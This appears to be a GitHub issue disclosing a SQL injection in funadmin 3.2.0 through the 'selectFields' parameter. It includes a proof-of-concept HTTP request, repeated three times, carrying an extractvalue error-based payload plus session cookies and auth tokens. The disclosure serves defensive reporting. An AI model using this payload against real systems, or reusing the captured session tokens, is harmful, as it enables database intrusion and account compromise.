Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Vulnerability Product:funadmin Vulnerability version:.3.2.0 Vulnerability type:sql injection Vulnerability Details: Vulnerability location app\backend\controller\auth\Auth.php#adjust index method After getting the parameter selectFields here, continue to enter selectFields method app\common\traits\Curd.php#selectList
Finally, enter \vendor\topthink\think-orm\src\db\BaseQuery.php#field is spliced into sql without filtering to cause sql injection
Vulnerability reproduction: Background administrator rights poc GET /backend/auth.Auth/index.html?parentField=pid&selectFields%5Bname%5D=extractvalue%281%2Cconcat%28char%28126%29%2Cuser()%29%29&selectFields%5Bvalue%5D=id&tree=true HTTP/1.1 Host: 192.168.3.129:8092 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.9 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: Hm_lvt_ce074243117e698438c49cd037b593eb=1673498041; PHPSESSID=591a908579ac738f0fc0f53d05c6aa51; think_lang=zh-cn; Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Hm_lpvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; auth_account=YToxOntzOjEyOiJhY2Nlc3NfdG9rZW4iO3M6MzI3OiJleUowZVhBaU9pSktWMVFpTENKaGJHY2lPaUpJVXpJMU5pSjkuZXlKdFpXMWlaWEpmYVdRaU9qRTFORGdzSW1Gd2NHbGtJam9pSWl3aVlYQndjMlZqY21WMElqb2lJaXdpYVhOeklqb2lhSFIwY0hNNkx5OTNkM2N1Wm5WdVlXUnRhVzR1WTI5dElpd2lZWFZrSWpvaWFIUjBjSE02THk5M2QzY3VablZ1WVdSdGFXNHVZMjl0SWl3aWMyTnZjR1Z6SWpvaWNtOXNaVjloWTJObGMzTWlMQ0pwWVhRaU9qRTJOelE0T0RrMU1EQXNJbTVpWmlJNk1UWTNORGc0T1RVd01Dd2laWGh3SWpveE5qYzFOVGd3TnpBd2ZRLkJITHd5WU5nNkpVVUZmMFFucGM0aHk2YlZ1c1V6WkVqR3N2SElva0pxYU0iO30%3D; clound_account=YTo0OntzOjI6ImlkIjtpOjE1NDg7czo4OiJ1c2VybmFtZSI7czoxMDoibXlmdW5hZG1pbiI7czo4OiJuaWNrbmFtZSI7czowOiIiO3M6NjoiYXZhdGFyIjtzOjM2OiIvc3RhdGljL2Zyb250ZW5kL2ltYWdlcy9hdmF0YXIvNi5qcGciO30%3D X-Requested-With: XMLHttpRequest Accept-Encoding: gzip
GET /backend/auth.Auth/index.html?parentField=pid&selectFields%5Bname%5D=extractvalue%281%2Cconcat%28char%28126%29%2Cuser()%29%29&selectFields%5Bvalue%5D=id&tree=true HTTP/1.1 Host: 192.168.3.129:8092 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.9 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: Hm_lvt_ce074243117e698438c49cd037b593eb=1673498041; PHPSESSID=591a908579ac738f0fc0f53d05c6aa51; think_lang=zh-cn; Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Hm_lpvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; auth_account=YToxOntzOjEyOiJhY2Nlc3NfdG9rZW4iO3M6MzI3OiJleUowZVhBaU9pSktWMVFpTENKaGJHY2lPaUpJVXpJMU5pSjkuZXlKdFpXMWlaWEpmYVdRaU9qRTFORGdzSW1Gd2NHbGtJam9pSWl3aVlYQndjMlZqY21WMElqb2lJaXdpYVhOeklqb2lhSFIwY0hNNkx5OTNkM2N1Wm5WdVlXUnRhVzR1WTI5dElpd2lZWFZrSWpvaWFIUjBjSE02THk5M2QzY3VablZ1WVdSdGFXNHVZMjl0SWl3aWMyTnZjR1Z6SWpvaWNtOXNaVjloWTJObGMzTWlMQ0pwWVhRaU9qRTJOelE0T0RrMU1EQXNJbTVpWmlJNk1UWTNORGc0T1RVd01Dd2laWGh3SWpveE5qYzFOVGd3TnpBd2ZRLkJITHd5WU5nNkpVVUZmMFFucGM0aHk2YlZ1c1V6WkVqR3N2SElva0pxYU0iO30%3D; clound_account=YTo0OntzOjI6ImlkIjtpOjE1NDg7czo4OiJ1c2VybmFtZSI7czoxMDoibXlmdW5hZG1pbiI7czo4OiJuaWNrbmFtZSI7czowOiIiO3M6NjoiYXZhdGFyIjtzOjM2OiIvc3RhdGljL2Zyb250ZW5kL2ltYWdlcy9hdmF0YXIvNi5qcGciO30%3D X-Requested-With: XMLHttpRequest Accept-Encoding: gzip
The text was updated successfully, but these errors were encountered:
find by Chaitin Security Research Lab
Sorry, something went wrong.
No branches or pull requests
Vulnerability Product:funadmin


Vulnerability version:.3.2.0
Vulnerability type:sql injection
Vulnerability Details:
Vulnerability location app\backend\controller\auth\Auth.php#adjust index method
After getting the parameter selectFields here, continue to enter
selectFields method
app\common\traits\Curd.php#selectList
Finally, enter \vendor\topthink\think-orm\src\db\BaseQuery.php#field is spliced into sql without filtering to cause sql injection
Vulnerability reproduction:

Background administrator rights
poc
GET /backend/auth.Auth/index.html?parentField=pid&selectFields%5Bname%5D=extractvalue%281%2Cconcat%28char%28126%29%2Cuser()%29%29&selectFields%5Bvalue%5D=id&tree=true HTTP/1.1 Host: 192.168.3.129:8092 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.9 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: Hm_lvt_ce074243117e698438c49cd037b593eb=1673498041; PHPSESSID=591a908579ac738f0fc0f53d05c6aa51; think_lang=zh-cn; Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Hm_lpvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; auth_account=YToxOntzOjEyOiJhY2Nlc3NfdG9rZW4iO3M6MzI3OiJleUowZVhBaU9pSktWMVFpTENKaGJHY2lPaUpJVXpJMU5pSjkuZXlKdFpXMWlaWEpmYVdRaU9qRTFORGdzSW1Gd2NHbGtJam9pSWl3aVlYQndjMlZqY21WMElqb2lJaXdpYVhOeklqb2lhSFIwY0hNNkx5OTNkM2N1Wm5WdVlXUnRhVzR1WTI5dElpd2lZWFZrSWpvaWFIUjBjSE02THk5M2QzY3VablZ1WVdSdGFXNHVZMjl0SWl3aWMyTnZjR1Z6SWpvaWNtOXNaVjloWTJObGMzTWlMQ0pwWVhRaU9qRTJOelE0T0RrMU1EQXNJbTVpWmlJNk1UWTNORGc0T1RVd01Dd2laWGh3SWpveE5qYzFOVGd3TnpBd2ZRLkJITHd5WU5nNkpVVUZmMFFucGM0aHk2YlZ1c1V6WkVqR3N2SElva0pxYU0iO30%3D; clound_account=YTo0OntzOjI6ImlkIjtpOjE1NDg7czo4OiJ1c2VybmFtZSI7czoxMDoibXlmdW5hZG1pbiI7czo4OiJuaWNrbmFtZSI7czowOiIiO3M6NjoiYXZhdGFyIjtzOjM2OiIvc3RhdGljL2Zyb250ZW5kL2ltYWdlcy9hdmF0YXIvNi5qcGciO30%3D X-Requested-With: XMLHttpRequest Accept-Encoding: gzipThe text was updated successfully, but these errors were encountered: